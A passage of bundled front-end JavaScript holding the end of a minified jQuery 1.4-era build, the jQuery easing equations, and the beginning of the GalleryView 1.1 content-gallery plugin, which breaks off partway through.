function(){try{return new z.ActiveXObject("Microsoft.XMLHTTP")}catch(a){}},accepts:{xml:"application/xml, text/xml",html:"text/html",script:"text/javascript, application/javascript",json:"application/json, text/javascript",text:"text/plain",_default:"*/*"}},lastModified:{},etag:{},ajax:function(a){function b(){e.success&&e.success.call(o,n,j,w);e.global&&f("ajaxSuccess",[w,e])}function d(){e.complete&&e.complete.call(o,w,j);e.global&&f("ajaxComplete",[w,e]);e.global&&!--c.active&&c.event.trigger("ajaxStop")}
function f(q,p){(e.context?c(e.context):c.event).trigger(q,p)}var e=c.extend(true,{},c.ajaxSettings,a),i,j,n,o=a&&a.context||e,m=e.type.toUpperCase();if(e.data&&e.processData&&typeof e.data!=="string")e.data=c.param(e.data,e.traditional);if(e.dataType==="jsonp"){if(m==="GET")N.test(e.url)||(e.url+=(ja.test(e.url)?"&":"?")+(e.jsonp||"callback")+"=?");else if(!e.data||!N.test(e.data))e.data=(e.data?e.data+"&":"")+(e.jsonp||"callback")+"=?";e.dataType="json"}if(e.dataType==="json"&&(e.data&&N.test(e.data)||
N.test(e.url))){i=e.jsonpCallback||"jsonp"+pb++;if(e.data)e.data=(e.data+"").replace(N,"="+i+"$1");e.url=e.url.replace(N,"="+i+"$1");e.dataType="script";z[i]=z[i]||function(q){n=q;b();d();z[i]=v;try{delete z[i]}catch(p){}A&&A.removeChild(B)}}if(e.dataType==="script"&&e.cache===null)e.cache=false;if(e.cache===false&&m==="GET"){var s=J(),x=e.url.replace(tb,"$1_="+s+"$2");e.url=x+(x===e.url?(ja.test(e.url)?"&":"?")+"_="+s:"")}if(e.data&&m==="GET")e.url+=(ja.test(e.url)?"&":"?")+e.data;e.global&&!c.active++&&
c.event.trigger("ajaxStart");s=(s=ub.exec(e.url))&&(s[1]&&s[1]!==location.protocol||s[2]!==location.host);if(e.dataType==="script"&&m==="GET"&&s){var A=r.getElementsByTagName("head")[0]||r.documentElement,B=r.createElement("script");B.src=e.url;if(e.scriptCharset)B.charset=e.scriptCharset;if(!i){var C=false;B.onload=B.onreadystatechange=function(){if(!C&&(!this.readyState||this.readyState==="loaded"||this.readyState==="complete")){C=true;b();d();B.onload=B.onreadystatechange=null;A&&B.parentNode&&
A.removeChild(B)}}}A.insertBefore(B,A.firstChild);return v}var E=false,w=e.xhr();if(w){e.username?w.open(m,e.url,e.async,e.username,e.password):w.open(m,e.url,e.async);try{if(e.data||a&&a.contentType)w.setRequestHeader("Content-Type",e.contentType);if(e.ifModified){c.lastModified[e.url]&&w.setRequestHeader("If-Modified-Since",c.lastModified[e.url]);c.etag[e.url]&&w.setRequestHeader("If-None-Match",c.etag[e.url])}s||w.setRequestHeader("X-Requested-With","XMLHttpRequest");w.setRequestHeader("Accept",
e.dataType&&e.accepts[e.dataType]?e.accepts[e.dataType]+", */*":e.accepts._default)}catch(fa){}if(e.beforeSend&&e.beforeSend.call(o,w,e)===false){e.global&&!--c.active&&c.event.trigger("ajaxStop");w.abort();return false}e.global&&f("ajaxSend",[w,e]);var g=w.onreadystatechange=function(q){if(!w||w.readyState===0||q==="abort"){E||d();E=true;if(w)w.onreadystatechange=c.noop}else if(!E&&w&&(w.readyState===4||q==="timeout")){E=true;w.onreadystatechange=c.noop;j=q==="timeout"?"timeout":!c.httpSuccess(w)?
"error":e.ifModified&&c.httpNotModified(w,e.url)?"notmodified":"success";var p;if(j==="success")try{n=c.httpData(w,e.dataType,e)}catch(u){j="parsererror";p=u}if(j==="success"||j==="notmodified")i||b();else c.handleError(e,w,j,p);d();q==="timeout"&&w.abort();if(e.async)w=null}};try{var h=w.abort;w.abort=function(){w&&h.call(w);g("abort")}}catch(k){}e.async&&e.timeout>0&&setTimeout(function(){w&&!E&&g("timeout")},e.timeout);try{w.send(m==="POST"||m==="PUT"||m==="DELETE"?e.data:null)}catch(l){c.handleError(e,
w,null,l);d()}e.async||g();return w}},handleError:function(a,b,d,f){if(a.error)a.error.call(a.context||a,b,d,f);if(a.global)(a.context?c(a.context):c.event).trigger("ajaxError",[b,a,f])},active:0,httpSuccess:function(a){try{return!a.status&&location.protocol==="file:"||a.status>=200&&a.status<300||a.status===304||a.status===1223||a.status===0}catch(b){}return false},httpNotModified:function(a,b){var d=a.getResponseHeader("Last-Modified"),f=a.getResponseHeader("Etag");if(d)c.lastModified[b]=d;if(f)c.etag[b]=
f;return a.status===304||a.status===0},httpData:function(a,b,d){var f=a.getResponseHeader("content-type")||"",e=b==="xml"||!b&&f.indexOf("xml")>=0;a=e?a.responseXML:a.responseText;e&&a.documentElement.nodeName==="parsererror"&&c.error("parsererror");if(d&&d.dataFilter)a=d.dataFilter(a,b);if(typeof a==="string")if(b==="json"||!b&&f.indexOf("json")>=0)a=c.parseJSON(a);else if(b==="script"||!b&&f.indexOf("javascript")>=0)c.globalEval(a);return a},param:function(a,b){function d(j,n){if(c.isArray(n))c.each(n,
function(o,m){b?f(j,m):d(j+"["+(typeof m==="object"||c.isArray(m)?o:"")+"]",m)});else!b&&n!=null&&typeof n==="object"?c.each(n,function(o,m){d(j+"["+o+"]",m)}):f(j,n)}function f(j,n){n=c.isFunction(n)?n():n;e[e.length]=encodeURIComponent(j)+"="+encodeURIComponent(n)}var e=[];if(b===v)b=c.ajaxSettings.traditional;if(c.isArray(a)||a.jquery)c.each(a,function(){f(this.name,this.value)});else for(var i in a)d(i,a[i]);return e.join("&").replace(vb,"+")}});var ka={},wb=/toggle|show|hide/,xb=/^([+-]=)?([\d+-.]+)(.*)$/,
W,ta=[["height","marginTop","marginBottom","paddingTop","paddingBottom"],["width","marginLeft","marginRight","paddingLeft","paddingRight"],["opacity"]];c.fn.extend({show:function(a,b){if(a||a===0)return this.animate(K("show",3),a,b);else{a=0;for(b=this.length;a<b;a++){var d=c.data(this[a],"olddisplay");this[a].style.display=d||"";if(c.css(this[a],"display")==="none"){d=this[a].nodeName;var f;if(ka[d])f=ka[d];else{var e=c("<"+d+" />").appendTo("body");f=e.css("display");if(f==="none")f="block";e.remove();
ka[d]=f}c.data(this[a],"olddisplay",f)}}a=0;for(b=this.length;a<b;a++)this[a].style.display=c.data(this[a],"olddisplay")||"";return this}},hide:function(a,b){if(a||a===0)return this.animate(K("hide",3),a,b);else{a=0;for(b=this.length;a<b;a++){var d=c.data(this[a],"olddisplay");!d&&d!=="none"&&c.data(this[a],"olddisplay",c.css(this[a],"display"))}a=0;for(b=this.length;a<b;a++)this[a].style.display="none";return this}},_toggle:c.fn.toggle,toggle:function(a,b){var d=typeof a==="boolean";if(c.isFunction(a)&&
c.isFunction(b))this._toggle.apply(this,arguments);else a==null||d?this.each(function(){var f=d?a:c(this).is(":hidden");c(this)[f?"show":"hide"]()}):this.animate(K("toggle",3),a,b);return this},fadeTo:function(a,b,d){return this.filter(":hidden").css("opacity",0).show().end().animate({opacity:b},a,d)},animate:function(a,b,d,f){var e=c.speed(b,d,f);if(c.isEmptyObject(a))return this.each(e.complete);return this[e.queue===false?"each":"queue"](function(){var i=c.extend({},e),j,n=this.nodeType===1&&c(this).is(":hidden"),
o=this;for(j in a){var m=j.replace(ha,ia);if(j!==m){a[m]=a[j];delete a[j];j=m}if(a[j]==="hide"&&n||a[j]==="show"&&!n)return i.complete.call(this);if((j==="height"||j==="width")&&this.style){i.display=c.css(this,"display");i.overflow=this.style.overflow}if(c.isArray(a[j])){(i.specialEasing=i.specialEasing||{})[j]=a[j][1];a[j]=a[j][0]}}if(i.overflow!=null)this.style.overflow="hidden";i.curAnim=c.extend({},a);c.each(a,function(s,x){var A=new c.fx(o,i,s);if(wb.test(x))A[x==="toggle"?n?"show":"hide":x](a);
else{var B=xb.exec(x),C=A.cur(true)||0;if(B){x=parseFloat(B[2]);var E=B[3]||"px";if(E!=="px"){o.style[s]=(x||1)+E;C=(x||1)/A.cur(true)*C;o.style[s]=C+E}if(B[1])x=(B[1]==="-="?-1:1)*x+C;A.custom(C,x,E)}else A.custom(C,x,"")}});return true})},stop:function(a,b){var d=c.timers;a&&this.queue([]);this.each(function(){for(var f=d.length-1;f>=0;f--)if(d[f].elem===this){b&&d[f](true);d.splice(f,1)}});b||this.dequeue();return this}});c.each({slideDown:K("show",1),slideUp:K("hide",1),slideToggle:K("toggle",
1),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"}},function(a,b){c.fn[a]=function(d,f){return this.animate(b,d,f)}});c.extend({speed:function(a,b,d){var f=a&&typeof a==="object"?a:{complete:d||!d&&b||c.isFunction(a)&&a,duration:a,easing:d&&b||b&&!c.isFunction(b)&&b};f.duration=c.fx.off?0:typeof f.duration==="number"?f.duration:c.fx.speeds[f.duration]||c.fx.speeds._default;f.old=f.complete;f.complete=function(){f.queue!==false&&c(this).dequeue();c.isFunction(f.old)&&f.old.call(this)};return f},easing:{linear:function(a,
b,d,f){return d+f*a},swing:function(a,b,d,f){return(-Math.cos(a*Math.PI)/2+0.5)*f+d}},timers:[],fx:function(a,b,d){this.options=b;this.elem=a;this.prop=d;if(!b.orig)b.orig={}}});c.fx.prototype={update:function(){this.options.step&&this.options.step.call(this.elem,this.now,this);(c.fx.step[this.prop]||c.fx.step._default)(this);if((this.prop==="height"||this.prop==="width")&&this.elem.style)this.elem.style.display="block"},cur:function(a){if(this.elem[this.prop]!=null&&(!this.elem.style||this.elem.style[this.prop]==
null))return this.elem[this.prop];return(a=parseFloat(c.css(this.elem,this.prop,a)))&&a>-10000?a:parseFloat(c.curCSS(this.elem,this.prop))||0},custom:function(a,b,d){function f(i){return e.step(i)}this.startTime=J();this.start=a;this.end=b;this.unit=d||this.unit||"px";this.now=this.start;this.pos=this.state=0;var e=this;f.elem=this.elem;if(f()&&c.timers.push(f)&&!W)W=setInterval(c.fx.tick,13)},show:function(){this.options.orig[this.prop]=c.style(this.elem,this.prop);this.options.show=true;this.custom(this.prop===
"width"||this.prop==="height"?1:0,this.cur());c(this.elem).show()},hide:function(){this.options.orig[this.prop]=c.style(this.elem,this.prop);this.options.hide=true;this.custom(this.cur(),0)},step:function(a){var b=J(),d=true;if(a||b>=this.options.duration+this.startTime){this.now=this.end;this.pos=this.state=1;this.update();this.options.curAnim[this.prop]=true;for(var f in this.options.curAnim)if(this.options.curAnim[f]!==true)d=false;if(d){if(this.options.display!=null){this.elem.style.overflow=
this.options.overflow;a=c.data(this.elem,"olddisplay");this.elem.style.display=a?a:this.options.display;if(c.css(this.elem,"display")==="none")this.elem.style.display="block"}this.options.hide&&c(this.elem).hide();if(this.options.hide||this.options.show)for(var e in this.options.curAnim)c.style(this.elem,e,this.options.orig[e]);this.options.complete.call(this.elem)}return false}else{e=b-this.startTime;this.state=e/this.options.duration;a=this.options.easing||(c.easing.swing?"swing":"linear");this.pos=
c.easing[this.options.specialEasing&&this.options.specialEasing[this.prop]||a](this.state,e,0,1,this.options.duration);this.now=this.start+(this.end-this.start)*this.pos;this.update()}return true}};c.extend(c.fx,{tick:function(){for(var a=c.timers,b=0;b<a.length;b++)a[b]()||a.splice(b--,1);a.length||c.fx.stop()},stop:function(){clearInterval(W);W=null},speeds:{slow:600,fast:200,_default:400},step:{opacity:function(a){c.style(a.elem,"opacity",a.now)},_default:function(a){if(a.elem.style&&a.elem.style[a.prop]!=
null)a.elem.style[a.prop]=(a.prop==="width"||a.prop==="height"?Math.max(0,a.now):a.now)+a.unit;else a.elem[a.prop]=a.now}}});if(c.expr&&c.expr.filters)c.expr.filters.animated=function(a){return c.grep(c.timers,function(b){return a===b.elem}).length};c.fn.offset="getBoundingClientRect"in r.documentElement?function(a){var b=this[0];if(a)return this.each(function(e){c.offset.setOffset(this,a,e)});if(!b||!b.ownerDocument)return null;if(b===b.ownerDocument.body)return c.offset.bodyOffset(b);var d=b.getBoundingClientRect(),
f=b.ownerDocument;b=f.body;f=f.documentElement;return{top:d.top+(self.pageYOffset||c.support.boxModel&&f.scrollTop||b.scrollTop)-(f.clientTop||b.clientTop||0),left:d.left+(self.pageXOffset||c.support.boxModel&&f.scrollLeft||b.scrollLeft)-(f.clientLeft||b.clientLeft||0)}}:function(a){var b=this[0];if(a)return this.each(function(s){c.offset.setOffset(this,a,s)});if(!b||!b.ownerDocument)return null;if(b===b.ownerDocument.body)return c.offset.bodyOffset(b);c.offset.initialize();var d=b.offsetParent,f=
b,e=b.ownerDocument,i,j=e.documentElement,n=e.body;f=(e=e.defaultView)?e.getComputedStyle(b,null):b.currentStyle;for(var o=b.offsetTop,m=b.offsetLeft;(b=b.parentNode)&&b!==n&&b!==j;){if(c.offset.supportsFixedPosition&&f.position==="fixed")break;i=e?e.getComputedStyle(b,null):b.currentStyle;o-=b.scrollTop;m-=b.scrollLeft;if(b===d){o+=b.offsetTop;m+=b.offsetLeft;if(c.offset.doesNotAddBorder&&!(c.offset.doesAddBorderForTableAndCells&&/^t(able|d|h)$/i.test(b.nodeName))){o+=parseFloat(i.borderTopWidth)||
0;m+=parseFloat(i.borderLeftWidth)||0}f=d;d=b.offsetParent}if(c.offset.subtractsBorderForOverflowNotVisible&&i.overflow!=="visible"){o+=parseFloat(i.borderTopWidth)||0;m+=parseFloat(i.borderLeftWidth)||0}f=i}if(f.position==="relative"||f.position==="static"){o+=n.offsetTop;m+=n.offsetLeft}if(c.offset.supportsFixedPosition&&f.position==="fixed"){o+=Math.max(j.scrollTop,n.scrollTop);m+=Math.max(j.scrollLeft,n.scrollLeft)}return{top:o,left:m}};c.offset={initialize:function(){var a=r.body,b=r.createElement("div"),
d,f,e,i=parseFloat(c.curCSS(a,"marginTop",true))||0;c.extend(b.style,{position:"absolute",top:0,left:0,margin:0,border:0,width:"1px",height:"1px",visibility:"hidden"});b.innerHTML="<div style='position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;'><div></div></div><table style='position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;' cellpadding='0' cellspacing='0'><tr><td></td></tr></table>";a.insertBefore(b,a.firstChild);
d=b.firstChild;f=d.firstChild;e=d.nextSibling.firstChild.firstChild;this.doesNotAddBorder=f.offsetTop!==5;this.doesAddBorderForTableAndCells=e.offsetTop===5;f.style.position="fixed";f.style.top="20px";this.supportsFixedPosition=f.offsetTop===20||f.offsetTop===15;f.style.position=f.style.top="";d.style.overflow="hidden";d.style.position="relative";this.subtractsBorderForOverflowNotVisible=f.offsetTop===-5;this.doesNotIncludeMarginInBodyOffset=a.offsetTop!==i;a.removeChild(b);c.offset.initialize=c.noop},
bodyOffset:function(a){var b=a.offsetTop,d=a.offsetLeft;c.offset.initialize();if(c.offset.doesNotIncludeMarginInBodyOffset){b+=parseFloat(c.curCSS(a,"marginTop",true))||0;d+=parseFloat(c.curCSS(a,"marginLeft",true))||0}return{top:b,left:d}},setOffset:function(a,b,d){if(/static/.test(c.curCSS(a,"position")))a.style.position="relative";var f=c(a),e=f.offset(),i=parseInt(c.curCSS(a,"top",true),10)||0,j=parseInt(c.curCSS(a,"left",true),10)||0;if(c.isFunction(b))b=b.call(a,d,e);d={top:b.top-e.top+i,left:b.left-
e.left+j};"using"in b?b.using.call(a,d):f.css(d)}};c.fn.extend({position:function(){if(!this[0])return null;var a=this[0],b=this.offsetParent(),d=this.offset(),f=/^body|html$/i.test(b[0].nodeName)?{top:0,left:0}:b.offset();d.top-=parseFloat(c.curCSS(a,"marginTop",true))||0;d.left-=parseFloat(c.curCSS(a,"marginLeft",true))||0;f.top+=parseFloat(c.curCSS(b[0],"borderTopWidth",true))||0;f.left+=parseFloat(c.curCSS(b[0],"borderLeftWidth",true))||0;return{top:d.top-f.top,left:d.left-f.left}},offsetParent:function(){return this.map(function(){for(var a=
this.offsetParent||r.body;a&&!/^body|html$/i.test(a.nodeName)&&c.css(a,"position")==="static";)a=a.offsetParent;return a})}});c.each(["Left","Top"],function(a,b){var d="scroll"+b;c.fn[d]=function(f){var e=this[0],i;if(!e)return null;if(f!==v)return this.each(function(){if(i=ua(this))i.scrollTo(!a?f:c(i).scrollLeft(),a?f:c(i).scrollTop());else this[d]=f});else return(i=ua(e))?"pageXOffset"in i?i[a?"pageYOffset":"pageXOffset"]:c.support.boxModel&&i.document.documentElement[d]||i.document.body[d]:e[d]}});
c.each(["Height","Width"],function(a,b){var d=b.toLowerCase();c.fn["inner"+b]=function(){return this[0]?c.css(this[0],d,false,"padding"):null};c.fn["outer"+b]=function(f){return this[0]?c.css(this[0],d,false,f?"margin":"border"):null};c.fn[d]=function(f){var e=this[0];if(!e)return f==null?null:this;if(c.isFunction(f))return this.each(function(i){var j=c(this);j[d](f.call(this,i,j[d]()))});return"scrollTo"in e&&e.document?e.document.compatMode==="CSS1Compat"&&e.document.documentElement["client"+b]||
e.document.body["client"+b]:e.nodeType===9?Math.max(e.documentElement["client"+b],e.body["scroll"+b],e.documentElement["scroll"+b],e.body["offset"+b],e.documentElement["offset"+b]):f===v?c.css(e,d):this.css(d,typeof f==="string"?f:f+"px")}});z.jQuery=z.$=c})(window);



// t: current time, b: begInnIng value, c: change In value, d: duration
jQuery.easing['jswing'] = jQuery.easing['swing'];

jQuery.extend( jQuery.easing,
{
	def: 'easeOutQuad',
	swing: function (x, t, b, c, d) {
		//alert(jQuery.easing.default);
		return jQuery.easing[jQuery.easing.def](x, t, b, c, d);
	},
	easeInQuad: function (x, t, b, c, d) {
		return c*(t/=d)*t + b;
	},
	easeOutQuad: function (x, t, b, c, d) {
		return -c *(t/=d)*(t-2) + b;
	},
	easeInOutQuad: function (x, t, b, c, d) {
		if ((t/=d/2) < 1) return c/2*t*t + b;
		return -c/2 * ((--t)*(t-2) - 1) + b;
	},
	easeInCubic: function (x, t, b, c, d) {
		return c*(t/=d)*t*t + b;
	},
	easeOutCubic: function (x, t, b, c, d) {
		return c*((t=t/d-1)*t*t + 1) + b;
	},
	easeInOutCubic: function (x, t, b, c, d) {
		if ((t/=d/2) < 1) return c/2*t*t*t + b;
		return c/2*((t-=2)*t*t + 2) + b;
	},
	easeInQuart: function (x, t, b, c, d) {
		return c*(t/=d)*t*t*t + b;
	},
	easeOutQuart: function (x, t, b, c, d) {
		return -c * ((t=t/d-1)*t*t*t - 1) + b;
	},
	easeInOutQuart: function (x, t, b, c, d) {
		if ((t/=d/2) < 1) return c/2*t*t*t*t + b;
		return -c/2 * ((t-=2)*t*t*t - 2) + b;
	},
	easeInQuint: function (x, t, b, c, d) {
		return c*(t/=d)*t*t*t*t + b;
	},
	easeOutQuint: function (x, t, b, c, d) {
		return c*((t=t/d-1)*t*t*t*t + 1) + b;
	},
	easeInOutQuint: function (x, t, b, c, d) {
		if ((t/=d/2) < 1) return c/2*t*t*t*t*t + b;
		return c/2*((t-=2)*t*t*t*t + 2) + b;
	},
	easeInSine: function (x, t, b, c, d) {
		return -c * Math.cos(t/d * (Math.PI/2)) + c + b;
	},
	easeOutSine: function (x, t, b, c, d) {
		return c * Math.sin(t/d * (Math.PI/2)) + b;
	},
	easeInOutSine: function (x, t, b, c, d) {
		return -c/2 * (Math.cos(Math.PI*t/d) - 1) + b;
	},
	easeInExpo: function (x, t, b, c, d) {
		return (t==0) ? b : c * Math.pow(2, 10 * (t/d - 1)) + b;
	},
	easeOutExpo: function (x, t, b, c, d) {
		return (t==d) ? b+c : c * (-Math.pow(2, -10 * t/d) + 1) + b;
	},
	easeInOutExpo: function (x, t, b, c, d) {
		if (t==0) return b;
		if (t==d) return b+c;
		if ((t/=d/2) < 1) return c/2 * Math.pow(2, 10 * (t - 1)) + b;
		return c/2 * (-Math.pow(2, -10 * --t) + 2) + b;
	},
	easeInCirc: function (x, t, b, c, d) {
		return -c * (Math.sqrt(1 - (t/=d)*t) - 1) + b;
	},
	easeOutCirc: function (x, t, b, c, d) {
		return c * Math.sqrt(1 - (t=t/d-1)*t) + b;
	},
	easeInOutCirc: function (x, t, b, c, d) {
		if ((t/=d/2) < 1) return -c/2 * (Math.sqrt(1 - t*t) - 1) + b;
		return c/2 * (Math.sqrt(1 - (t-=2)*t) + 1) + b;
	},
	easeInElastic: function (x, t, b, c, d) {
		var s=1.70158;var p=0;var a=c;
		if (t==0) return b;  if ((t/=d)==1) return b+c;  if (!p) p=d*.3;
		if (a < Math.abs(c)) { a=c; var s=p/4; }
		else var s = p/(2*Math.PI) * Math.asin (c/a);
		return -(a*Math.pow(2,10*(t-=1)) * Math.sin( (t*d-s)*(2*Math.PI)/p )) + b;
	},
	easeOutElastic: function (x, t, b, c, d) {
		var s=1.70158;var p=0;var a=c;
		if (t==0) return b;  if ((t/=d)==1) return b+c;  if (!p) p=d*.3;
		if (a < Math.abs(c)) { a=c; var s=p/4; }
		else var s = p/(2*Math.PI) * Math.asin (c/a);
		return a*Math.pow(2,-10*t) * Math.sin( (t*d-s)*(2*Math.PI)/p ) + c + b;
	},
	easeInOutElastic: function (x, t, b, c, d) {
		var s=1.70158;var p=0;var a=c;
		if (t==0) return b;  if ((t/=d/2)==2) return b+c;  if (!p) p=d*(.3*1.5);
		if (a < Math.abs(c)) { a=c; var s=p/4; }
		else var s = p/(2*Math.PI) * Math.asin (c/a);
		if (t < 1) return -.5*(a*Math.pow(2,10*(t-=1)) * Math.sin( (t*d-s)*(2*Math.PI)/p )) + b;
		return a*Math.pow(2,-10*(t-=1)) * Math.sin( (t*d-s)*(2*Math.PI)/p )*.5 + c + b;
	},
	easeInBack: function (x, t, b, c, d, s) {
		if (s == undefined) s = 1.70158;
		return c*(t/=d)*t*((s+1)*t - s) + b;
	},
	easeOutBack: function (x, t, b, c, d, s) {
		if (s == undefined) s = 1.70158;
		return c*((t=t/d-1)*t*((s+1)*t + s) + 1) + b;
	},
	easeInOutBack: function (x, t, b, c, d, s) {
		if (s == undefined) s = 1.70158; 
		if ((t/=d/2) < 1) return c/2*(t*t*(((s*=(1.525))+1)*t - s)) + b;
		return c/2*((t-=2)*t*(((s*=(1.525))+1)*t + s) + 2) + b;
	},
	easeInBounce: function (x, t, b, c, d) {
		return c - jQuery.easing.easeOutBounce (x, d-t, 0, c, d) + b;
	},
	easeOutBounce: function (x, t, b, c, d) {
		if ((t/=d) < (1/2.75)) {
			return c*(7.5625*t*t) + b;
		} else if (t < (2/2.75)) {
			return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b;
		} else if (t < (2.5/2.75)) {
			return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b;
		} else {
			return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b;
		}
	},
	easeInOutBounce: function (x, t, b, c, d) {
		if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b;
		return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b;
	}
});


/*

	GalleryView - jQuery Content Gallery Plugin
	Author: 		Jack Anderson
	Version:		1.1 (April 5, 2009)
	Documentation: 	http://www.spaceforaname.com/jquery/galleryview/
	
	Please use this development script if you intend to make changes to the
	plugin code.  For production sites, please use jquery.galleryview-1.0.1-pack.js.
	
*/
(function($){
	$.fn.galleryView = function(options) {
		var opts = $.extend($.fn.galleryView.defaults,options);
		
		var id;
		var iterator = 0;
		var gallery_width;
		var gallery_height;
		var frame_margin = 10;
		var strip_width;
		var wrapper_width;
		var item_count = 0;
		var slide_method;
		var img_path;
		var paused = false;
		var frame_caption_size = 20;
		var frame_margin_top = 5;
		var pointer_width = 2;
		
		//Define jQuery objects for reuse
		var j_gallery;
		var j_filmstrip;
		var j_frames;
		var j_panels;
		var j_pointer;
		
/************************************************/
/*	Plugin Methods								*/
/************************************************/	
		function showItem(i) {
			//Disable next/prev buttons until transition is complete
			$('img.nav-next').unbind('click');
			$('img.nav-prev').unbind('click');
			j_frames.unbind('click');
			if(has_panels) {
				if(opts.fade_panels) {
					//Fade out all panels and fade in target panel
					j_panels.fadeOut(opts.transition_speed).eq(i%item_count).fadeIn(opts.transition_speed,function(){
						if(!has_filmstrip) {
							$('img.nav-prev').click(showPrevItem);
							$('img.nav-next').click(showNextItem);		
						}
					});
				} 
			}
			
			if(has_filmstrip) {
				//Slide either pointer or filmstrip, depending on transition method
				if(slide_method=='strip') {
					//Stop filmstrip if it's currently in motion
					j_filmstrip.stop();
					
					//Determine distance between pointer (eventual destination) and target frame
					var distance = getPos(j_frames[i]).left - (getPos(j_pointer[0]).left+2);
					var leftstr = (distance>=0?'-=':'+=')+Math.abs(distance)+'px';
					
					//Animate filmstrip and slide target frame under pointer
					//If target frame is a duplicate, jump back to 'original' frame
					j_filmstrip.animate({
						'left':leftstr
					},opts.transition_speed,opts.easing,function(){
						//Always ensure that there are a sufficient number of hidden frames on either
						//side of the filmstrip to avoid empty frames
						if(i>item_count) {
							i = i%item_count;
							iterator = i;
							j_filmstrip.css('left','-'+((opts.frame_width+frame_margin)*i)+'px');
						} else if (i<=(item_count-strip_size)) {
							i = (i%item_count)+item_count;
							iterator = i;
							j_filmstrip.css('left','-'+((opts.frame_width+frame_margin)*i)+'px');
						}
						
						if(!opts.fade_panels) {
							j_panels.hide().eq(i%item_count).show();
						}
						$('img.nav-prev').click(showPrevItem);
						$('img.nav-next').click(showNextItem);
						enableFrameClicking();
					});
				} else if(slide_method=='pointer') {
					//Stop pointer if it's currently in motion
					j_pointer.stop();
					//Get position of target frame
					var pos = getPos(j_frames[i]);
					//Slide the pointer over the target frame
					j_pointer.animate({
						'left':(pos.left-2+'px')
					},opts.transition_speed,opts.easing,function(){	
						if(!opts.fade_panels) {
							j_panels.hide().eq(i%item_count).show();
						}	
						$('img.nav-prev').click(showPrevItem);
						$('img.nav-next').click(showNextItem);
						enableFrameClicking();
					});
				}
			
				if($('a',j_frames[i])[0]) {
					j_pointer.unbind('click').click(function(){
						var a = $('a',j_frames[i]).eq(0);
						if(a.attr('target')=='_blank') {window.open(a.attr('href'));}
						else {location.href = a.attr('href');}
					});
				}
			}
		};
		function showNextItem() {
			$(document).stopTime("transition");
			if(++iterator==j_frames.length) {iterator=0;}
			showItem(iterator);
			$(document).everyTime(opts.transition_interval,"transition",function(){
				showNextItem();
			});
		};
		function showPrevItem() {
			$(document).stopTime("transition");
			if(--iterator<0) {iterator = item_count-1;}
			//alert(iterator);
			showItem(iterator);
			$(document).everyTime(opts.transition_interval,"transition",function(){
				showNextItem();
			});
		};
		function getPos(el) {
			var left = 0, top = 0;
			var el_id = el.id;
			if(el.offsetParent) {
				do {
					left += el.offsetLeft;
					top += el.offsetTop;
				} while(el = el.offsetParent);
			}
			//If we want the position of the gallery itself, return it
			if(el_id == id) {return {'left':left,'top':top};}
			//Otherwise, get position of element relative to gallery
			else {
				var gPos = getPos(j_gallery[0]);
				var gLeft = gPos.left;
				var gTop = gPos.top;
				
				return {'left':left-gLeft,'top':top-gTop};
			}
		};
		function enableFrameClicking() {
			j_frames.each(function(i){
				//If there isn't a link in this frame, set up frame to slide on click
				//Frames with links will handle themselves
				if($('a',this).length==0) {
					$(this).click(function(){
						$(document).stopTime("transition");
						showItem(i);
						iterator = i;
						$(document).everyTime(opts.transition_interval,"transition",function(){
							showNextItem();
						});
					});
				}
			});
		};
		
		function buildPanels() {
			//If there are panel captions, add overlay divs
			if($('.panel-overlay').length>0) {j_panels.append('<div class="overlay"></div>');}
			
			if(!has_filmstrip) {
				//Add navigation buttons
				$('<img />').addClass('nav-next').attr('src',img_path+opts.nav_theme+'/next.png').appendTo(j_gallery).css({
					'position':'absolute',
					'zIndex':'1100',
					'cursor':'pointer',
					'top':((opts.panel_height-22)/2)+'px',
					'right':'10px',
					'display':'none'
				}).click(showNextItem);
				$('<img />').addClass('nav-prev').attr('src',img_path+opts.nav_theme+'/prev.png').appendTo(j_gallery).css({
					'position':'absolute',
					'zIndex':'1100',
					'cursor':'pointer',
					'top':((opts.panel_height-22)/2)+'px',
					'left':'10px',
					'display':'none'
				}).click(showPrevItem);
				
				$('<img />').addClass('nav-overlay').attr('src',img_path+opts.nav_theme+'/panel-nav-next.png').appendTo(j_gallery).css({
					'position':'absolute',
					'zIndex':'1099',
					'top':((opts.panel_height-22)/2)-10+'px',
					'right':'0',
					'display':'none'
				});
				
				$('<img />').addClass('nav-overlay').attr('src',img_path+opts.nav_theme+'/panel-nav-prev.png').appendTo(j_gallery).css({
					'position':'absolute',
					'zIndex':'1099',
					'top':((opts.panel_height-22)/2)-10+'px',
					'left':'0',
					'display':'none'
				});
			}
			j_panels.css({
				'width':(opts.panel_width-parseInt(j_panels.css('paddingLeft').split('px')[0],10)-parseInt(j_panels.css('paddingRight').split('px')[0],10))+'px',
				'height':(opts.panel_height-parseInt(j_panels.css('paddingTop').split('px')[0],10)-parseInt(j_panels.css('paddingBottom').split('px')[0],10))+'px',
				'position':'absolute',
				'top':(opts.filmstrip_position=='top'?(opts.frame_height+frame_margin_top+(opts.show_captions?frame_caption_size:frame_margin_top))+'px':'0px'),
				'left':'0px',
				'overflow':'hidden',
				'background':'white',
				'display':'none'
			});
			$('.panel-overlay',j_panels).css({
				'position':'absolute',
				'zIndex':'999',
				'width':(opts.panel_width-20)+'px',
				'height':opts.overlay_height+'px',
				'top':(opts.overlay_position=='top'?'0':opts.panel_height-opts.overlay_height+'px'),
				'left':'0',
				'padding':'0 10px',
				'color':opts.overlay_text_color,
				'fontSize':opts.overlay_font_size
			});
			$('.panel-overlay a',j_panels).css({
				'color':opts.overlay_text_color,
				'textDecoration':'underline',
				'fontWeight':'bold'
			});
			$('.overlay',j_panels).css({
				'position':'absolute',
				'zIndex':'998',
				'width':opts.panel_width+'px',
				'height':opts.overlay_height+'px',
				'top':(opts.overlay_position=='top'?'0':opts.panel_height-opts.overlay_height+'px'),
				'left':'0',
				'background':opts.overlay_color,
				'opacity':opts.overlay_opacity
			});
			$('.panel iframe',j_panels).css({
				'width':opts.panel_width+'px',
				'height':(opts.panel_height-opts.overlay_height)+'px',
				'border':'0'
			});
		};
		
		function buildFilmstrip() {
